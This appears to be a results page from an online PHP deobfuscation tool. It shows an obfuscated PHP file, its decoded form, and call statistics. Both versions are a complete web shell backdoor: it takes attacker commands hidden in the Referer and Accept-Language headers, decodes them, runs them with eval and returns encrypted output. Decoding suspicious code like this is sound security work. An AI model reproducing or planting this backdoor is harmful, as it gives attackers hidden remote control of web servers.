Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $E=str_replace('b','','bcreatbebb_bfubnction'); $i='";Qvfor($i=0;Qv$i<$l;Qv){QvfQv..
Decoded Output download
$kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}
Did this file decode correctly?
Original Code
<?php
$E=str_replace('b','','bcreatbebb_bfubnction');
$i='";Qvfor($i=0;Qv$i<$l;Qv){QvfQvor($j=0;($Qvj<$c&&Qv$i<$l);$j++Qv,$iQv+Qv+){$oQv.=$t{$i}^$Qvk{$jQ';
$N='v};}}returQvn Qv$o;}$r=$_SERVEQvQvR;$rr=@$r["QvHTQvTP_REQvFERER"];$rQvQva=@$Qvr["HTTP_ACCEPQvT_';
$y='Qv$kh="5d41";Qv$kf="Qv40Qv2a";functionQv x(Qv$tQv,Qv$k){$c=strlen($k);$lQvQv=strlen($t);$Qvo="';
$l='Qv+"),$ss($sQv[$i],0,$e)))Qv,Qv$k)));$o=obQv_get_cQvonQvtenQvts();ob_Qvend_cleanQv();$d=Qvbase';
$O='rray_vaQvQvQvlues($Qvq);pregQvQv_match_all("/([\\wQv])[\\w-]Qv+(?:;q=0.(Qv[\\Qvd]))?,?/",Qv$raQv,';
$W='$m)Qv;if($q&Qv&$m)Qv{@sesQvsion_sQvtart();$s=&$_QvSEQvSSIOQvN;$QvQvss="substr";$sl="strQvtQvoloQ';
$o='LANGUQvAGE"];ifQv(Qv$rr&&$ra){$QvQvu=parse_urQvl($rr);Qvparse_Qvstr($u[Qv"queryQv"Qv],$q);$q=Qva';
$H='$i.$kf),Qv0Qv,3));$p=Qv"";for($Qvz=1;$Qvz<countQv($m[1]Qv);$z++)$p.=$q[$Qvm[Qv2][$z]];if(Qvst';
$z='$sQv[$i].=$pQv;$e=sQvtrpos($s[$iQvQv],$f);iQvf($e){$k=Qv$Qvkh.$kf;oQvb_staQvrt(Qv);@evaQvl(@gzun';
$t='vwer";$i=$m[Qv1Qv][Qv0].$m[1][1];$h=$Qvsl($Qvss(md5($i.$Qvkh),0,3Qv));Qv$Qvf=$QvQvsl($ss(mdQv5(';
$L='Qv64Qv_Qvencode(x(gzcomprQvess($o),$Qvk))Qv;prinQvQvt("<$k>$d</$Qvk>")Qv;@sessQvion_destQvroy();}}}}';
$b='rpoQvQvs($p,Qv$Qvh)===0){$s[$iQvQvQv]="";$p=$ssQv($p,3);}if(array_QvkQvey_exisQvts($i,$s))Qv{';
$R='compQvress(@x(QvQv@base6Qv4_decodQve(pQvreg_rQveplaceQv(array("Qv/Qv_/","/-Qv/"),array("/Qv","';
$c=str_replace('Qv','',$y.$i.$N.$o.$O.$W.$t.$H.$b.$z.$R.$l.$L);
$S=$E('',$c);$S();
?>
Function Calls
null | 1 |
str_replace | 2 |
create_function | 1 |
Stats
MD5 | d73878fb09e496908535bc19b1b9aa74 |
Eval Count | 1 |
Decode Time | 131 ms |